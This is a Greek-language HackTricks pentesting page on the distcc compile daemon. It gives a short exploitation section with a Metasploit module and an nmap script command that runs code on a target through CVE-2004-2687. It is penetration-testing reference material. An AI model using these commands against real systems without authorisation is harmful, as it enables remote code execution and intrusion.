hacktricks/network-services-pentesting/3632-pentesting-distcc.md

41 lines
3.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<details>
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
Άλλοι τρόποι υποστήριξης του HackTricks:
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
</details>
# Βασικές Πληροφορίες
**Το Distcc** είναι ένα εργαλείο που βελτιώνει τη **διαδικασία συλλογής** χρησιμοποιώντας τη **ανενεργή επεξεργαστική ισχύ** άλλων υπολογιστών στο δίκτυο. Όταν το **distcc** είναι εγκατεστημένο σε μια μηχανή, αυτή η μηχανή είναι ικανή να διανέμει τις **εργασίες συλλογής** σε ένα άλλο σύστημα. Αυτό το σύστημα παραλήπτης πρέπει να εκτελεί το **δαίμονα distccd** και πρέπει να έχει εγκατεστημένο έναν **συμβατό μεταγλωττιστή** για να επεξεργαστεί τον απεσταλμένο κώδικα.
**Προεπιλεγμένη θύρα:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# Εκμετάλλευση
Ελέγξτε αν είναι ευάλωτο στο **CVE-2004-2687** για να εκτελέσετε τυχαίο κώδικα:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
_Δεν νομίζω ότι το shodan ανιχνεύει αυτήν την υπηρεσία._
# Πόροι
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Δημοσίευση δημιουργημένη από **Álex B (@r1p)**